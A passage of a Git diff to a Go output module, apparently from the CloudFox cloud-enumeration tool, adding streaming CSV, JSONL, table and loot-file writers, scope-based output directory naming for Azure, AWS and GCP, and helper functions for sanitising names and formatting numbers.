csvFile.WriteString(strings.Join(cleanRow, ",") + "\n") + } + } + + // Stream JSONL rows + if format == "all" || format == "json" { + if err := AppendJSONL(outDirectoryPath, t); err != nil { + return fmt.Errorf("failed to append JSONL: %w", err) + } + } + } + + // ---- STREAM LOOT ---- + for _, l := range dataToOutput.LootFiles() { + lootDir := filepath.Join(outDirectoryPath, "loot") + if err := os.MkdirAll(lootDir, 0o755); err != nil { + return fmt.Errorf("failed to create loot directory: %w", err) + } + + lootPath := filepath.Join(lootDir, l.Name+".txt") + lootFile, err := os.OpenFile(lootPath, 
os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + return fmt.Errorf("failed to open loot file: %w", err) + } + defer lootFile.Close() + + scanner := bufio.NewScanner(strings.NewReader(l.Contents)) + for scanner.Scan() { + if _, err := lootFile.WriteString(scanner.Text() + "\n"); err != nil { + return fmt.Errorf("failed to append loot line: %w", err) + } + } + if err := scanner.Err(); err != nil { + return fmt.Errorf("error reading loot lines: %w", err) + } + } + + // ---- FINALIZE TABLES MEMORY-SAFE ---- + if err := StreamFinalizeTables(cloudProvider, format, outputDirectory, verbosity, wrap, scopeType, scopeIdentifiers, scopeNames, principal, nil); err != nil { + return fmt.Errorf("failed to finalize tables: %w", err) + } + + // Log individual output files like the non-streaming output does + for _, t := range dataToOutput.TableFiles() { + safeName := sanitizeFileName(t.Name) + if format == "all" || format == "table" { + logger.InfoM(fmt.Sprintf("Output written to %s", filepath.Join(outDirectoryPath, "table", safeName+".txt")), baseCloudfoxModule) + } + if format == "all" || format == "csv" { + logger.InfoM(fmt.Sprintf("Output written to %s", filepath.Join(outDirectoryPath, "csv", safeName+".csv")), baseCloudfoxModule) + } + if format == "all" || format == "json" { + logger.InfoM(fmt.Sprintf("Output written to %s", filepath.Join(outDirectoryPath, "json", safeName+".jsonl")), baseCloudfoxModule) + } + } + for _, l := range dataToOutput.LootFiles() { + logger.InfoM(fmt.Sprintf("Output written to %s", filepath.Join(outDirectoryPath, "loot", l.Name+".txt")), baseCloudfoxModule) + } + + return nil +} + +// StreamFinalizeTables writes final tables line-by-line to avoid memory issues. +// It reads each .tmp file and writes it directly to a tab-delimited .txt table. 
+// Note: does not print a pretty table +// Uses the new directory structure: cloudfox-output/{CloudProvider}/{Principal}/{ScopeIdentifier}/ +func StreamFinalizeTables( + cloudProvider string, + format string, + outputDirectory string, + verbosity int, + wrap bool, + scopeType string, + scopeIdentifiers []string, + scopeNames []string, + principal string, + header []string, +) error { + + // Build scope identifier using same logic as HandleOutputSmart + resultsIdentifier := buildResultsIdentifier(scopeType, scopeIdentifiers, scopeNames) + + // Build consistent output path using NEW structure + outDirectoryPath := filepath.Join( + outputDirectory, + "cloudfox-output", + cloudProvider, + principal, + resultsIdentifier, + ) + + // Ensure final table directory exists + tableDir := filepath.Join(outDirectoryPath, "table") + if err := os.MkdirAll(tableDir, 0o755); err != nil { + return fmt.Errorf("failed to create table directory: %w", err) + } + + // Walk the output directory looking for .tmp files + err := filepath.Walk(outDirectoryPath, func(tmpPath string, info os.FileInfo, err error) error { + if err != nil { + return err + } + if info.IsDir() || !strings.HasSuffix(info.Name(), ".tmp") { + return nil + } + + // Derive final table file name + baseName := strings.TrimSuffix(info.Name(), ".tmp") + tablePath := filepath.Join(tableDir, baseName+".txt") + + // Open output .txt for writing + outFile, err := os.OpenFile(tablePath, os.O_CREATE|os.O_WRONLY|os.O_TRUNC, 0644) + if err != nil { + return fmt.Errorf("failed to open final table file %s: %w", tablePath, err) + } + defer outFile.Close() + + // Write header row + if len(header) > 0 { + _, _ = fmt.Fprintln(outFile, strings.Join(header, "\t")) + } + + // Stream each row from .tmp file line-by-line + tmpFile, err := os.Open(tmpPath) + if err != nil { + return fmt.Errorf("failed to open tmp file %s: %w", tmpPath, err) + } + defer tmpFile.Close() + + scanner := bufio.NewScanner(tmpFile) + for scanner.Scan() { + line := 
scanner.Text() + cols := strings.Split(line, ",") + // Remove any ANSI color codes + cols = removeColorCodesFromSlice(cols) + _, _ = fmt.Fprintln(outFile, strings.Join(cols, "\t")) + } + if scanErr := scanner.Err(); scanErr != nil { + return fmt.Errorf("error scanning tmp file %s: %w", tmpPath, scanErr) + } + + // Delete the temporary .tmp file after streaming + _ = os.Remove(tmpPath) + + return nil + }) + + return err +} + +// streamRenderTableWithHeader renders a tmp file into a table with a single header row. +func streamRenderTableWithHeader(tmpFilePath string, header []string, outFile *os.File, wrap bool) error { + t := table.New(outFile) + if !wrap { + t.SetColumnMaxWidth(1000) + } + + if len(header) > 0 { + t.SetHeaders(header...) + } + + t.SetRowLines(false) + t.SetDividers(table.UnicodeRoundedDividers) + t.SetAlignment(table.AlignLeft) + t.SetHeaderStyle(table.StyleBold) + + // Stream rows from tmp file + f, err := os.Open(tmpFilePath) + if err != nil { + return err + } + defer f.Close() + + scanner := bufio.NewScanner(f) + for scanner.Scan() { + line := scanner.Text() + row := strings.Split(line, ",") + t.AddRow(row...) 
+ } + if err := scanner.Err(); err != nil { + return err + } + + t.Render() + return nil +} + +func AppendCSV(outputDir string, table TableFile) error { + csvDir := filepath.Join(outputDir, "csv") + if err := os.MkdirAll(csvDir, 0o755); err != nil { + return err + } + + filePath := filepath.Join(csvDir, table.Name+".csv") + f, err := os.OpenFile(filePath, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + return err + } + defer f.Close() + + writer := csv.NewWriter(f) + // Only write header if file is new + info, err := f.Stat() + if err != nil { + return err + } + if info.Size() == 0 { + if err := writer.Write(table.Header); err != nil { + return err + } + } + + for _, row := range table.Body { + row = removeColorCodesFromSlice(row) + if err := writer.Write(row); err != nil { + return err + } + } + writer.Flush() + return writer.Error() +} + +func AppendLoot(outputDir string, loot LootFile) error { + lootDir := filepath.Join(outputDir, "loot") + if err := os.MkdirAll(lootDir, 0o755); err != nil { + return err + } + + filePath := filepath.Join(lootDir, loot.Name+".txt") + f, err := os.OpenFile(filePath, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + return err + } + defer f.Close() + + if _, err := f.WriteString(loot.Contents + "\n"); err != nil { + return err + } + return nil +} + +func AppendJSON(outputDir string, table TableFile) error { + jsonDir := filepath.Join(outputDir, "json") + if err := os.MkdirAll(jsonDir, 0o755); err != nil { + return err + } + + filePath := filepath.Join(jsonDir, table.Name+".json") + var existing []map[string]string + + // Try to load existing JSON if file exists + if _, err := os.Stat(filePath); err == nil { + data, err := os.ReadFile(filePath) + if err != nil { + return err + } + if len(data) > 0 { + if err := json.Unmarshal(data, &existing); err != nil { + return err + } + } + } + + // Append new rows + for _, row := range table.Body { + rowMap := make(map[string]string) + for i, col := range row { + 
rowMap[table.Header[i]] = col + } + existing = append(existing, rowMap) + } + + jsonBytes, err := json.MarshalIndent(existing, "", " ") + if err != nil { + return err + } + + return os.WriteFile(filePath, jsonBytes, 0644) +} + +func AppendJSONL(outputDir string, table TableFile) error { + jsonDir := filepath.Join(outputDir, "json") + if err := os.MkdirAll(jsonDir, 0o755); err != nil { + return err + } + + filePath := filepath.Join(jsonDir, table.Name+".jsonl") + f, err := os.OpenFile(filePath, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + return err + } + defer f.Close() + + for _, row := range table.Body { + rowMap := make(map[string]string) + for i, col := range row { + rowMap[table.Header[i]] = col + } + jsonBytes, _ := json.Marshal(rowMap) + if _, err := f.Write(append(jsonBytes, '\n')); err != nil { + return err + } + } + + return nil +} + +func AppendLootFile(outputDirectory, lootFileName, entry string) error { + // Ensure output directory exists + lootDir := filepath.Join(outputDirectory, "loot") + if err := os.MkdirAll(lootDir, 0755); err != nil { + return fmt.Errorf("failed to create loot directory: %w", err) + } + + // Loot file path + lootPath := filepath.Join(lootDir, fmt.Sprintf("%s.txt", lootFileName)) + + // Lock so concurrent workers don't clobber each other + lootFileMu.Lock() + defer lootFileMu.Unlock() + + // Open in append mode + f, err := os.OpenFile(lootPath, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + return fmt.Errorf("failed to open loot file: %w", err) + } + defer f.Close() + + // Write entry with newline + if _, err := f.WriteString(entry + "\n"); err != nil { + return fmt.Errorf("failed to write to loot file: %w", err) + } + + return nil +} + func removeColorCodes(input string) string { // Regular expression to match ANSI color codes ansiRegExp := regexp.MustCompile(`\x1b\[[0-9;]*m`) @@ -425,28 +863,6 @@ func (b *TableClient) createJSONFiles() { } } -// func (b *TableClient) writeJSONFiles() []string { 
-// var fullFilePaths []string - -// for _, file := range b.TableFiles { -// file.Body = removeColorCodesFromNestedSlice(file.Body) -// jsonBytes, err := json.Marshal(file.Body) -// if err != nil { -// log.Fatalf("error marshalling json: %s", err) -// } - -// _, err = file.JSONFilePointer.Write(jsonBytes) -// if err != nil { -// log.Fatalf("error writing json: %s", err) -// } - -// fullPath := path.Join(b.DirectoryName, "json", fmt.Sprintf("%s.json", file.Name)) -// fullFilePaths = append(fullFilePaths, fullPath) -// } - -// return fullFilePaths -// } - func (b *TableClient) writeJSONFiles() []string { var fullFilePaths []string @@ -518,3 +934,264 @@ func WriteJsonlFile(file *os.File, data interface{}) error { } return nil } + +func sanitizeFileName(name string) string { + // replace / and \ with _ + re := regexp.MustCompile(`[\\/]+`) + return re.ReplaceAllString(name, "_") +} + +// ============================================================================ +// NEW OUTPUT FUNCTIONS V2 - Multi-cloud support with intelligent routing +// ============================================================================ + +// HandleOutputV2 is the new generic output function that supports multi-cloud +// environments (Azure, AWS, GCP) with proper scope handling. +// This function provides a cleaner directory structure based on scope type. 
+// +// Directory structure: +// - Azure (tenant mode): cloudfox-output/Azure/{UPN}/{TenantName}/module.csv +// - Azure (subscription mode): cloudfox-output/Azure/{UPN}/{SubscriptionName}/module.csv +// - AWS (org mode): cloudfox-output/AWS/{Principal}/{OrgID}/module.csv +// - AWS (account mode): cloudfox-output/AWS/{Principal}/{AccountName}/module.csv +// - GCP (org mode): cloudfox-output/GCP/{Principal}/{OrgID}/module.csv +// - GCP (project mode): cloudfox-output/GCP/{Principal}/{ProjectName}/module.csv +func HandleOutputV2( + cloudProvider string, + format string, + outputDirectory string, + verbosity int, + wrap bool, + scopeType string, // "tenant", "subscription", "organization", "account", "project" + scopeIdentifiers []string, // Tenant IDs, Subscription IDs, Account IDs, Project IDs + scopeNames []string, // Friendly names for scopes + principal string, // UPN or IAM user + dataToOutput CloudfoxOutput, +) error { + // Build the results identifier based on scope + resultsIdentifier := buildResultsIdentifier(scopeType, scopeIdentifiers, scopeNames) + + // Build output directory path with new structure + // Format: cloudfox-output/{CloudProvider}/{Principal}/{ResultsIdentifier}/ + outDirectoryPath := filepath.Join( + outputDirectory, + "cloudfox-output", + cloudProvider, + principal, + resultsIdentifier, + ) + + tables := dataToOutput.TableFiles() + lootFiles := dataToOutput.LootFiles() + + // Determine base module name from first table file (for backwards compatibility) + baseCloudfoxModule := "" + if len(tables) > 0 { + baseCloudfoxModule = tables[0].Name + } + + outputClient := OutputClient{ + Verbosity: verbosity, + CallingModule: baseCloudfoxModule, + Table: TableClient{ + Wrap: wrap, + DirectoryName: outDirectoryPath, + TableFiles: tables, + }, + Loot: LootClient{ + DirectoryName: outDirectoryPath, + LootFiles: lootFiles, + }, + } + + // Handle output based on the verbosity level + outputClient.WriteFullOutput(tables, lootFiles) + return nil +} + +// 
HandleOutputSmart automatically selects the best output method based on dataset size. +// This is the RECOMMENDED function for all modules to use. +// +// Decision thresholds: +// - < 50,000 rows: Uses HandleOutputV2 (normal in-memory) +// - >= 50,000 rows: Uses HandleStreamingOutput (memory-efficient streaming) +// - >= 500,000 rows: Logs warning about large dataset +// - >= 1,000,000 rows: Logs critical warning, suggests optimization flags +func HandleOutputSmart( + cloudProvider string, + format string, + outputDirectory string, + verbosity int, + wrap bool, + scopeType string, + scopeIdentifiers []string, + scopeNames []string, + principal string, + dataToOutput CloudfoxOutput, +) error { + logger := NewLogger() + + // Count total rows across all table files + totalRows := 0 + for _, tableFile := range dataToOutput.TableFiles() { + totalRows += len(tableFile.Body) + } + + // Log dataset size if verbose + if verbosity >= 2 { + logger.InfoM(fmt.Sprintf("Dataset size: %s rows", formatNumberWithCommas(totalRows)), "output") + } + + // Decision tree based on row count + if totalRows >= 1000000 { + logger.InfoM(fmt.Sprintf("WARNING: Very large dataset detected (%s rows). Consider using per-scope flags for better performance.", + formatNumberWithCommas(totalRows)), "output") + } else if totalRows >= 500000 { + logger.InfoM(fmt.Sprintf("WARNING: Large dataset detected (%s rows). 
Using streaming output.", + formatNumberWithCommas(totalRows)), "output") + } + + // Auto-select output method based on dataset size + if totalRows >= 50000 { + if verbosity >= 1 { + logger.InfoM(fmt.Sprintf("Using streaming output for memory efficiency (%s rows)", + formatNumberWithCommas(totalRows)), "output") + } + + // Use streaming output for large datasets (new signature) + return HandleStreamingOutput( + cloudProvider, + format, + outputDirectory, + verbosity, + wrap, + scopeType, + scopeIdentifiers, + scopeNames, + principal, + dataToOutput, + ) + } + + // Use normal in-memory output for smaller datasets + return HandleOutputV2( + cloudProvider, + format, + outputDirectory, + verbosity, + wrap, + scopeType, + scopeIdentifiers, + scopeNames, + principal, + dataToOutput, + ) +} + +// buildResultsIdentifier creates a results identifier from scope information. +// It prefers friendly names over IDs for better readability. +// +// Fallback hierarchy: +// - Azure: Tenant Name → Tenant GUID → Subscription Name → Subscription GUID +// - AWS: Org Name → Org ID → Account Alias → Account ID +// - GCP: Org Name → Org ID → Project Name → Project ID +// +// Directory Naming Convention: +// - Tenant-level: [T]{TenantName} or [T]{TenantGUID} +// - Subscription-level: [S]{SubscriptionName} or [S]{SubscriptionGUID} +// - Organization-level: [O]-{OrgName} or [O]-{OrgID} +// - Account-level: [A]-{AccountName} or [A]-{AccountID} +// - Project-level: [P]-{ProjectName} or [P]-{ProjectID} +func buildResultsIdentifier(scopeType string, identifiers, names []string) string { + var rawName string + + // Prefer friendly name if available + if len(names) > 0 && names[0] != "" { + rawName = names[0] + } else if len(identifiers) > 0 && identifiers[0] != "" { + // Fallback to identifier + rawName = identifiers[0] + } else { + // Ultimate fallback + rawName = "unknown-scope" + } + + // Sanitize the name for Windows/Linux compatibility + sanitizedName := sanitizeDirectoryName(rawName) + + // 
Add scope prefix based on scope type + prefix := getScopePrefix(scopeType) + if prefix != "" { + return prefix + sanitizedName + } + + return sanitizedName +} + +// getScopePrefix returns the appropriate prefix for a given scope type +func getScopePrefix(scopeType string) string { + switch scopeType { + case "tenant": + return "[T]" + case "subscription": + return "[S]" + case "organization": + return "[O]" + case "account": + return "[A]" + case "project": + return "[P]" + default: + return "" + } +} + +// sanitizeDirectoryName removes or replaces characters that are invalid in Windows/Linux directory names +// Invalid characters: < > : " / \ | ? * +// Also trims leading/trailing spaces and dots (Windows restriction) +func sanitizeDirectoryName(name string) string { + // Replace invalid characters with underscore + invalidChars := []string{"<", ">", ":", "\"", "/", "\\", "|", "?", "*"} + sanitized := name + for _, char := range invalidChars { + sanitized = strings.ReplaceAll(sanitized, char, "_") + } + + // Trim leading/trailing spaces and dots (Windows doesn't allow these) + sanitized = strings.Trim(sanitized, " .") + + // If the name is empty after sanitization, use a default + if sanitized == "" { + sanitized = "unnamed" + } + + return sanitized +} + +// formatNumberWithCommas formats a number with comma separators for readability. +// Example: 1000000 -> "1,000,000" +func formatNumberWithCommas(n int) string { + // Convert to string + s := fmt.Sprintf("%d", n) + + // Handle negative numbers + negative := false + if s[0] == '-' { + negative = true + s = s[1:] + } + + // Add commas every 3 digits from right + var result []rune + for i, digit := range s { + if i > 0 && (len(s)-i)%3 == 0 { + result = append(result, ',') + } + result = append(result, digit) + } + + if negative { + return "-" + string(result) + } + return string(result) +}